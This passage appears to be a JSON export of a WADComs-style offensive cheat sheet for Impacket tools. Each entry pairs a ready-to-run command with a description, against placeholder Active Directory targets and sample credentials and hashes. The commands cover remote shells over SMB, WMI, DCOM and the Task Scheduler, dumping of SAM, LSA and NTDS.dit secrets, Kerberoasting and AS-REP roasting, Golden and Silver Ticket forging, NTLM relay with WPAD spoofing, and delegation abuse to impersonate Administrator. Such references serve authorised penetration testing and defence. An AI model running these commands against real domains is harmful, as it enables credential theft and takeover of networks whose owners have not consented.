tool","aliases":[]},{"id":"wadcoms:Impacket-DCOMExec","toolId":"wadcoms:Impacket-dcomexec","toolName":"Impacket-dcomexec","name":"Impacket-DCOMExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 dcomexec.py -object MMC20 test.local/john:password123@10.10.10.1","description":"Impacket's dcomexec.py provides an interactive shell on the Windows host similar to wmiexec.py, but using varying DCOM endpoints.\n\nCurrently supports MMC20.Application, ShellWindows, and ShellBrowserWindow DCOM objects.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDCOM Object: MMC20\n","mitre":[],"requires":["Password","Username"],"services":["DCOM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-Get-GPPPassword","toolId":"wadcoms:Impacket-Get-GPPPassword","toolName":"Impacket-Get-GPPPassword","name":"Impacket-Get-GPPPassword","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Enumeration"],"nativeCategory":["Exploitation","Enumeration"],"command":"python3 Get-GPPPassword.py 'TEST.local/john:password123@DC01.TEST.local' -dc-ip 10.10.10.1","description":"Python script to automatically extract and decrypt Group Policy Preferences (GPP) passwords using streams for carving files instead of mounting shares\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username","NTLM hash"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py","https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-GetADUsers","toolId":"wadcoms:Impacket-GetADUsers","toolName":"Impacket-GetADUsers","name":"Impacket-GetADUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 GetADUsers.py -all test.local/john:password123 -dc-ip 10.10.10.1","description":"Impacket's GetADUsers.py will attempt to gather data about the domain's users and their corresponding email addresses.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetADUsers.py"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-GetNPUsers","toolId":"wadcoms:Impacket-GetNPUsers","toolName":"Impacket-GetNPUsers","name":"Impacket-GetNPUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 GetNPUsers.py test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -format hashcat -outputfile hashes.txt","description":"Impacket's GetNPUsers.py will attempt to harvest the non-preauth AS_REP responses for a given list of usernames. These responses will be encrypted with the user's password, which can then be cracked offline.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n\n\tOutput File: hashes.txt\n","mitre":[],"requires":["Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-GetUserSPNs","toolId":"wadcoms:Impacket-GetUserSPNs","toolName":"Impacket-GetUserSPNs","name":"Impacket-GetUserSPNs","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 GetUserSPNs.py test.local/john:password123 -dc-ip 10.10.10.1 -request","description":"Impacket's GetUserSPNs.py will attempt to fetch Service Principal Names that are associated with normal user accounts. What is returned is a ticket that is encrypted with the user account's password, which can then be bruteforced offline.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-GoldenTicket","toolId":"wadcoms:Impacket-ticketer","toolName":"Impacket-ticketer","name":"Impacket-GoldenTicket","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -dc-ip 10.10.10.1 john","description":"Impacket's ticketer.py can perform Golden Ticket attacks, which crafts a valid TGT ticket using a valid user's NTLM hash. It is then possible to access any service using the TGT by requesting a TGS for that service.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: b18b4b218eccad1c223306ea1916885f\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n","mitre":[],"requires":["Username","NTLM hash"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-LookUpSID","toolId":"wadcoms:Impacket-lookupsid","toolName":"Impacket-lookupsid","name":"Impacket-LookUpSID","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 lookupsid.py test.local/john:password123@10.10.10.1","description":"Impacket's lookupsid.py performs bruteforcing of Windows SID's to identify users/groups on the remote target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py","https://www.puckiestyle.nl/impacket/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-NTLMRelayX-Socks","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-Socks","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 ntlmrelayx.py -smb2support -t smb://10.10.10.1 -socks","description":"Impacket's ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).\n\nThe below command creates an SMB relay server that targets the IP 10.10.10.1, meaning any credentials that the SMB server recieves, gets relayed to that IP to attempt to authenticate and create a socks connection to the host. In order for the SMB server to recieve credentials to relay, dementor.py or Petitpotam can be used to trigger a forced authentication from the IP it's targeting to an attacker controlled SMB server.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No credentials"],"services":["NTLM","SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-NTLMRelayX-WPAD","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX-WPAD","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 ntlmrelayx.py -t ldaps://dc.test.local -wh test-wpad --delegate-access","description":"Impacket's ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).\n\nThe below command will perform WPAD spoofing to force the victim machine to authenticate to the attacker controlled host. The command will then relay the authentication to create a new computer object and grant it delegation rights to impersonate users on the victim machine. This command should be used in conjunction with mitm6.\n\nCommand Reference:\n\n\tTarget Domain Controller: dc.test.local\n","mitre":[],"requires":["No credentials"],"services":["NTLM","LDAP"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-NTLMRelayX","toolId":"wadcoms:Impacket-ntlmrelayx","toolName":"Impacket-ntlmrelayx","name":"Impacket-NTLMRelayX","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 ntlmrelayx.py -smb2support -t smb://10.10.10.1 -c 'whoami /all' -debug","description":"Impacket's ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).\n\nThe below command creates an SMB relay server that targets the IP 10.10.10.1, meaning any credentials that the SMB server recieves, gets relayed to that IP to attempt to authenticate and execute 'whoami /all'. In order for the SMB server to recieve credentials to relay, dementor.py can be used to trigger a forced authentication from the IP it's targeting to an attacker controlled SMB server.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No credentials"],"services":["NTLM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-PsExec-PassTheTicket","toolId":"wadcoms:Impacket-psexec","toolName":"Impacket-psexec","name":"Impacket-PsExec-PassTheTicket","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"export KRB5CCNAME=/full/path/to/john.ccache; python3 psexec.py test.local/john@10.10.10.1 -k -no-pass","description":"Impacket's psexec.py offers psexec like functionality. This will give you an interactive shell on the Windows host. psexec.py also allows using Service Tickets, saved as a ccache file for Authentication. It can be obtained via Impacket's GetST.py\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n","mitre":[],"requires":["Kerberos ticket","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py","https://www.sans.org/blog/psexec-python-rocks/","https://book.hacktricks.xyz/windows/active-directory-methodology/pass-the-ticket#pass-the-ticket-attack"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-PsExec","toolId":"wadcoms:Impacket-psexec","toolName":"Impacket-psexec","name":"Impacket-PsExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 psexec.py test.local/john:password123@10.10.10.1","description":"Impacket's psexec.py offers psexec like functionality. This will give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py","https://www.sans.org/blog/psexec-python-rocks/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-RBCD","toolId":"wadcoms:Impacket-rbcd","toolName":"Impacket-rbcd","name":"Impacket-RBCD","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation","Persistence"],"nativeCategory":["Exploitation","PrivEsc","Persistence"],"command":"python3 rbcd.py -action write -delegate-to \"DC01$\" -delegate-from \"EVILCOMPUTER$\" -dc-ip 10.10.10.1 -hashes :A9FDFA038C4B75EBC76DC855DD74F0DA test.local/john","description":"Impacket rbcd.py will modify the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer with security descriptor of another computer.\nThe following command adds the related security descriptor of the created EVILCOMPUTER to the msDS-AllowedToActOnBehalfOfOtherIdentity property of DC01.\nThis basically means that EVILCOMPUTER can get impersonated service tickets for DC01 using getST.py.\n\nCommand Reference:\n\n Target IP: 10.10.10.1\n\n Domain: test.local\n\n Username: john\n\n Hash: :A9FDFA038C4B75EBC76DC855DD74F0DA\n\n Delegate To: DC01$\n\n Delegate From: EVILCOMPUTER$\n","mitre":[],"requires":["Username","NTLM hash"],"services":["Kerberos","SMB","LDAP"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rbcd.py","https://github.com/tothi/rbcd-attack"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-RPCDump","toolId":"wadcoms:Impacket-rpcdump","toolName":"Impacket-rpcdump","name":"Impacket-RPCDump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 rpcdump.py test.local/john:password123@10.10.10.1","description":"Impacket's rpcdump.py enumerates Remote Procedure Call (RPC) endpoints.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-Reg","toolId":"wadcoms:Impacket-reg","toolName":"Impacket-reg","name":"Impacket-Reg","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 reg.py test.local/john:password123@10.10.10.1 query -keyName HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows -s","description":"Impacket's reg.py is a remote registry manipulation tool, providing similar functionality to reg.exe in Windows.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/reg.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-SAMRDump","toolId":"wadcoms:Impacket-samrdump","toolName":"Impacket-samrdump","name":"Impacket-SAMRDump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 samrdump.py test.local/john:password123@10.10.10.1","description":"Impacket's samrdump.py communicates with the Security Account Manager Remote (SAMR) interface to list system user accounts, available resource shares, and other sensitive information.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-SMBClient","toolId":"wadcoms:Impacket-smbclient","toolName":"Impacket-smbclient","name":"Impacket-SMBClient","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 smbclient.py test.local/john:password123@10.10.10.1","description":"Impacket's smbclient.py is a generic smbclient, allowing you to list shares and files, rename, upload and download files and create and delete directories.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbclient.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-SMBExec","toolId":"wadcoms:Impacket-smbexec","toolName":"Impacket-smbexec","name":"Impacket-SMBExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 smbexec.py test.local/john:password123@10.10.10.1","description":"Impacket's smbexec.py. This will give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py","https://www.varonis.com/blog/insider-danger-stealthy-password-hacking-with-smbexec/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-SecretsDump-NTDS","toolId":"wadcoms:Impacket-secretsdump","toolName":"Impacket-secretsdump","name":"Impacket-SecretsDump-NTDS","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 secretsdump.py -ntds C:\\Windows\\NTDS\\ntds.dit -system C:\\Windows\\System32\\Config\\system -dc-ip 10.10.10.1 test.local/john:password123@10.10.10.2","description":"Impacket's secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit. The following command will attempt to use the specified machines NTDS.dit and system file to extract the user account hashes associated with that machine.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.2\n\n\tDomain Controller: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos","NTLM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-SecretsDump","toolId":"wadcoms:Impacket-secretsdump","toolName":"Impacket-secretsdump","name":"Impacket-SecretsDump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 secretsdump.py test.local/john:password123@10.10.10.1","description":"Impacket's secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit. The following command will attempt to dump all secrets from the target machine using the previously mentioned techniques.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos","NTLM"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-Services","toolId":"wadcoms:Impacket-services","toolName":"Impacket-services","name":"Impacket-Services","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration"],"nativeCategory":["Enumeration"],"command":"python3 services.py test.local/john:password123@10.10.10.1 list","description":"Impacket's services.py communicates with Windows services using the MSRPC interface. It can perform many different actions on any service.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tAction: list\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/services.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-SilverTicket","toolId":"wadcoms:Impacket-ticketer","toolName":"Impacket-ticketer","name":"Impacket-SilverTicket","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -dc-ip 10.10.10.1 -spn cifs/test.local john","description":"Impacket's ticketer.py can perform Silver Ticket attacks, which crafts a valid TGS ticket for a specific service using a valid user's NTLM hash. It is then possible to gain access to that service. The following command crafts a TGS for the SMB service, which can then be used to gain a shell.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: b18b4b218eccad1c223306ea1916885f\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tSMB Service: cifs\n","mitre":[],"requires":["Username","NTLM hash"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-WMIExec","toolId":"wadcoms:Impacket-wmiexec","toolName":"Impacket-wmiexec","name":"Impacket-WMIExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 wmiexec.py test.local/john:password123@10.10.10.1","description":"Impacket's wmiexec.py uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["WMI"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#wmiexecpy"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-addcomputer-LDAPS","toolId":"wadcoms:Impacket-addcomputer","toolName":"Impacket-addcomputer","name":"Impacket-addcomputer-LDAPS","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 addcomputer.py -method LDAPS -dc-ip 10.10.10.1 -computer-pass TestPassword321 -computer-name testComputer test.local/john:password123","description":"Impacket's addcomputer.py will add a computer account to the domain and set its password. The following command will create a new computer over LDAPS. Plain LDAP is not supported, as it doesn't allow setting the password of the new computer.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tNew Computer Password: TestPassword123\n\n\tNew Computer Name: testComputer\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-addcomputer-SMB","toolId":"wadcoms:Impacket-addcomputer","toolName":"Impacket-addcomputer","name":"Impacket-addcomputer-SMB","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 addcomputer.py -method SAMR -dc-ip 10.10.10.1 -computer-pass TestPassword321 -computer-name testComputer test.local/john:password123","description":"Impacket's addcomputer.py will add a computer account to the domain and set its password. The following command will create a new computer over the SMB by specifying the `SAMR` method.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tNew Computer Password: TestPassword123\n\n\tNew Computer Name: testComputer\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-atexec-Creds","toolId":"wadcoms:Impacket-atexec","toolName":"Impacket-atexec","name":"Impacket-atexec-Creds","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 atexec.py test.local/john:password123@10.10.10.1 whoami","description":"Impacket's atexec.py uses the Task Scheduler service on the remote Windows host to execute the given command. It will create a windows task with a random name, trigger the task, and then delete it. The following command executes `whoami` on the remote Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCommand Executed: whoami\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py","https://u0041.co/blog/post/1"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-atexec-Hash","toolId":"wadcoms:Impacket-atexec","toolName":"Impacket-atexec","name":"Impacket-atexec-Hash","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 test.local/john@10.10.10.1 whoami","description":"Impacket's atexec.py uses the Task Scheduler service on the remote Windows host to execute the given command. It will create a windows task with a random name, trigger the task, and then delete it. The following command executes `whoami` on the remote Windows host, authenticating with the hash of user `john`.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76\n\n\tCommand Executed: whoami\n","mitre":[],"requires":["NTLM hash","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py","https://u0041.co/blog/post/1"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-getST-Creds","toolId":"wadcoms:Impacket-getST","toolName":"Impacket-getST","name":"Impacket-getST-Creds","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation","Persistence"],"nativeCategory":["Exploitation","PrivEsc","Persistence"],"command":"python3 getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123","description":"Impacket's getST.py will request a Service Ticket and save it as ccache. If the account has constrained delegation privileges, you can use the `-impersonate` flag to request a ticket on behalf of another user. The following command will impersonate the Administrator account and request a Service Ticket on its behalf for the `www` service on host `server01.test.local`.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tService: www\n\n\tHost Name: server01.test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tImpersonated User: Administrator\n","mitre":[],"requires":["Username","Password"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-getST-Hash","toolId":"wadcoms:Impacket-getST","toolName":"Impacket-getST","name":"Impacket-getST-Hash","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation","Persistence"],"nativeCategory":["Exploitation","PrivEsc","Persistence"],"command":"python3 getST.py -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john","description":"Impacket's getST.py will request a Service Ticket and save it as ccache. If the account has constrained delegation privileges, you can use the `-impersonate` flag to request a ticket on behalf of another user. The following command will impersonate the Administrator account using the hashed password of user `john` and request a Service Ticket on its behalf for the `www` service on host `server01.test.local`.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tService: www\n\n\tHost Name: server01.test.local\n\n\tUsername: john\n\n\tHash: :2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tImpersonated User: Administrator\n","mitre":[],"requires":["NTLM hash","Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"],"environment":["Active Directory"],"verification":"Upstream reference","availability":"Installed tool","aliases":[]},{"id":"wadcoms:Impacket-getTGT","toolId":"wadcoms:Impacket-getTGT","toolName":"Impacket-getTGT","name":"Impacket-getTGT","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 getTGT.py test.local/john -dc-ip 10.10.10.1 -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7","description":"Impacket's getTGT.py uses a valid user's NTLM hash to request Kerberos tickets, in order to access any service or machine where that user has permissions.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: 